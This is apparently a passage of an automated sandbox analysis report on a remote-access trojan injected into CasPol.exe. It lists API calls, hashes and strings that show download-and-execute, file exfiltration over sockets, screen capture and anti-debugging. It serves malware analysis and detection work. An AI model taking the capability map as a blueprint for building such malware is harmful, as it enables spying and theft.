                                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00406234
                                                                                                            • URLDownloadToFileW.URLMON(00000000,00000000,00000004,00000000,00000000), ref: 00406318
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: DownloadExecuteFileShell
                                                                                                            • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe$open
                                                                                                            • API String ID: 2825088817-4197237851
                                                                                                            • Opcode ID: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                                                            • Instruction ID: f68f5450864a8ef507c8d3860f756bd811b48be2db930e76b40a644c5c1bb7bc
                                                                                                            • Opcode Fuzzy Hash: 7e776ba55a5363882e5e0fdd32d5076bdbc944cfa7fb92e574dd5d07027ce71d
                                                                                                            • Instruction Fuzzy Hash: 0761A33160434067CA14FA76C8569BE77A69F81718F00493FBC46772D6EF3C9A05C69B
                                                                                                            APIs
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406ADD
                                                                                                            • FindNextFileW.KERNEL32(00000000,?,?,?,00000000), ref: 00406BA5
                                                                                                              • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstNextsend
                                                                                                            • String ID: x@G$x@G
                                                                                                            • API String ID: 4113138495-3390264752
                                                                                                            • Opcode ID: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                                                            • Instruction ID: 9df0c8526107c53e8273efc1e688d8f669138e67c86485f4ac558c26d22f9560
                                                                                                            • Opcode Fuzzy Hash: ab297d9523434e33b62ec7d17f5bfb0d18f84337fe1b3eac542df82c58dbccc1
                                                                                                            • Instruction Fuzzy Hash: B42147725043015BC714FB61D8959AF77A8AFD1358F40093EF996A31D1EF38AA088A9B
                                                                                                            APIs
                                                                                                            • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                                              • Part of subcall function 004126D2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                              • Part of subcall function 004126D2: RegSetValueExA.KERNELBASE(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                              • Part of subcall function 004126D2: RegCloseKey.KERNELBASE(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CloseCreateInfoParametersSystemValue
                                                                                                            • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                                                                            • API String ID: 4127273184-3576401099
                                                                                                            • Opcode ID: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction ID: a6c166168c7895b99543370299e99232025f4d6daba66cbb636fef562e17b9dc
                                                                                                            • Opcode Fuzzy Hash: a5c32248a9f687c15a35255313fa73033c651e0ffef1bc5fb235983aac5f5ce1
                                                                                                            • Instruction Fuzzy Hash: 06112432B8060433D514303A4E6FBAE1806D356B60FA4415FF6026A6DAFA9E5AE103DF
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00443CF3,?,?,?,?,?,?,00000004), ref: 00450B61
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BF1
                                                                                                            • _wcschr.LIBVCRUNTIME ref: 00450BFF
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00443CF3,00000000,00443E13), ref: 00450CA2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 4212172061-0
                                                                                                            • Opcode ID: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction ID: a02e79dc60b90d06ce6287b0e519d5a2a37574338541b46fb9e412c2f7ec0900
                                                                                                            • Opcode Fuzzy Hash: 11e9d858be2eef57e51fe3ee5abaff11ba74f3cf781d1ad02b19bd3dc5989495
                                                                                                            • Instruction Fuzzy Hash: D7613B79600306AAD729AB75CC82AAB73ACEF05316F14052FFD05D7243E778E909C768
                                                                                                            APIs
                                                                                                            • __EH_prolog.LIBCMT ref: 00408DAC
                                                                                                            • FindFirstFileW.KERNEL32(00000000,?), ref: 00408E24
                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00408E4D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileFind$FirstH_prologNext
                                                                                                            • String ID:
                                                                                                            • API String ID: 301083792-0
                                                                                                            • Opcode ID: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                                                            • Instruction ID: 60446431aa0b45b5fc099c057f6d50f3e7887136e12703af2d86415be67689ac
                                                                                                            • Opcode Fuzzy Hash: 86dbfe1775f8993f11ef77801d49ff7d9b45b30bdf2a989ad682b912e639e09b
                                                                                                            • Instruction Fuzzy Hash: 357140328001099BCB15EBA1DC919EE7778AF54318F10427FE856B71E2EF386E45CB98
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450EBE
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450F0F
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00450FCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorInfoLastLocale$_free$_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 2829624132-0
                                                                                                            • Opcode ID: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction ID: e92eb603d23812efeda5bde14236c6fbce748c008cf001f3fb8de25b7fcb8669
                                                                                                            • Opcode Fuzzy Hash: 022617d048d67c565bd8cd478daba609af81f9e307d0efc84ddd0a3e182c2dec
                                                                                                            • Instruction Fuzzy Hash: AC61D3365002079FDB289F24CD82BBB77A8EF04706F1041BBED05C6696E778D989DB58
                                                                                                            APIs
                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00434403), ref: 0043A755
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00434403), ref: 0043A75F
                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00434403), ref: 0043A76C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                            • String ID:
                                                                                                            • API String ID: 3906539128-0
                                                                                                            • Opcode ID: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction ID: 15fc2c217458336097e8e19d69e2940e7c5a4b77666d4e23b7e272f62fea865b
                                                                                                            • Opcode Fuzzy Hash: 3fa352bae2dd0906ed67bad857870cf194ce26166e1b5da63b4ea542d53f5057
                                                                                                            • Instruction Fuzzy Hash: 2D31D47490121CABCB21DF64D98979DBBB8BF08310F5052EAE81CA7251E7349F81CF49
                                                                                                            APIs
                                                                                                            • GetCurrentProcess.KERNEL32(004453F8,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 00442575
                                                                                                            • TerminateProcess.KERNEL32(00000000,?,0044252A,004453F8,0046DAE0,0000000C,00442681,004453F8,00000002,00000000,?,004453F8), ref: 0044257C
                                                                                                            • ExitProcess.KERNEL32 ref: 0044258E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                            • String ID:
                                                                                                            • API String ID: 1703294689-0
                                                                                                            • Opcode ID: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction ID: 6e58600c80f72e94ca833af3256d2da28fe7ef7edb4b61bff2e48710a34f1207
                                                                                                            • Opcode Fuzzy Hash: 7c471b5b7a391410b3ce269feae26e49b4a02911a71997b74fd7744fcc246e6d
                                                                                                            • Instruction Fuzzy Hash: 65E08C31004648BFDF016F14EE18A893F29EF10346F408475F80A8A632CFB9DE92CB88
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: .
                                                                                                            • API String ID: 0-248832578
                                                                                                            • Opcode ID: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                            • Instruction ID: db76f937e81630575b2700384d205b0ac401e8f874fa32e43cac1aabc581782c
                                                                                                            • Opcode Fuzzy Hash: 97cc3c3166f0870dddbca3780dbfd7dbd2d9d0e9e098b336076252ce6a3ce59f
                                                                                                            • Instruction Fuzzy Hash: CB310471900209AFEB249E79CC84EEB7BBDDB86318F1101AEF91897251E6389D458B64
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
                                                                                                            • Opcode Fuzzy Hash: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
                                                                                                            • Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID: <D
                                                                                                            • API String ID: 1084509184-3866323178
                                                                                                            • Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
                                                                                                            • Opcode Fuzzy Hash: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
                                                                                                            • Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
                                                                                                            APIs
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,?,?,00000004), ref: 004475EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID: GetLocaleInfoEx
                                                                                                            • API String ID: 2299586839-2904428671
                                                                                                            • Opcode ID: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction ID: 80a81796b135a3e0eaabc3ca7fb48afb6b687e063e78a0117ef0368584b3b56e
                                                                                                            • Opcode Fuzzy Hash: 8dab955c83ead38f4190d8cd68b3baa1d28bcda2227728d0cef18aa89ebed625
                                                                                                            • Instruction Fuzzy Hash: 82F0F031A44308BBDB11AF61EC06F6E7B25EF04712F00416AFC046A2A2CB359E11969E
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F2B
                                                                                                            • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$_free$InfoLocale_abort
                                                                                                            • String ID:
                                                                                                            • API String ID: 1663032902-0
                                                                                                            • Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
                                                                                                            • Opcode Fuzzy Hash: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
                                                                                                            • Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 2692324296-0
                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                            APIs
                                                                                                              • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-0003D155,?,0044225B,00000000,0046DAC0,0000000C,00442216,?,?,?,00448739,?,?,00446F74,00000001,00000364), ref: 00444ADB
                                                                                                            • EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                            • String ID:
                                                                                                            • API String ID: 1272433827-0
                                                                                                            • Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
                                                                                                            • Opcode Fuzzy Hash: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
                                                                                                            • Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
                                                                                                            APIs
                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,0043E260,0043931C,0043E260,?,?,0043B955,FF8BC35D), ref: 00446EC3
                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,FF8BC35D), ref: 00446F37
                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                            • String ID:
                                                                                                            • API String ID: 1084509184-0
                                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                            APIs
                                                                                                            • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,004145AD,00473EE8,00474A10,00473EE8,00000000,00473EE8,?,00473EE8,5.3.0 Pro), ref: 0040E68D
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: InfoLocale
                                                                                                            • String ID:
                                                                                                            • API String ID: 2299586839-0
                                                                                                            • Opcode ID: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                            • Instruction ID: fdf89a5244b67fc368892e36cd71d3b7bc7b33248e42f87f25a9228cb5794c84
                                                                                                            • Opcode Fuzzy Hash: ca1801b0e7e1465037cdf6632266da67ea6c9527f0861a44216c95eff7fcfe3c
                                                                                                            • Instruction Fuzzy Hash: E6D05E607002197BEA109291DC0AE9B7A9CE700B66F000165BA01E72C0E9A0AF008AE1
                                                                                                            APIs
                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                            • String ID:
                                                                                                            • API String ID: 3192549508-0
                                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                            • Instruction Fuzzy Hash:
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: HeapProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 54951025-0
                                                                                                            • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                            • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                            • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                            APIs
                                                                                                            • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                              • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                            • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                            • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                            • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                            • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                            • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                            • DeleteObject.GDI32(?), ref: 00418107
                                                                                                            • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                            • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                            • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                            • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                            • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                            • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                            • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                            • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                            • DeleteDC.GDI32(?), ref: 00418398
                                                                                                            • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                            • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000000C.00000002.4553325692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                            • String ID: DISPLAY
                                                                                                            • API String ID: 1765752176-865373369
                                                                                                            • Opcode ID: a503a9b89ef94286f2bd859c106661c8df3b5c206ce18e082a0ee4f25f069b57
                                                                                                            • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                            • Opcode Fuzzy Hash: a503a9b89ef94286f2bd859c106661c8df3b5c206ce18e082a0ee4f25f069b57
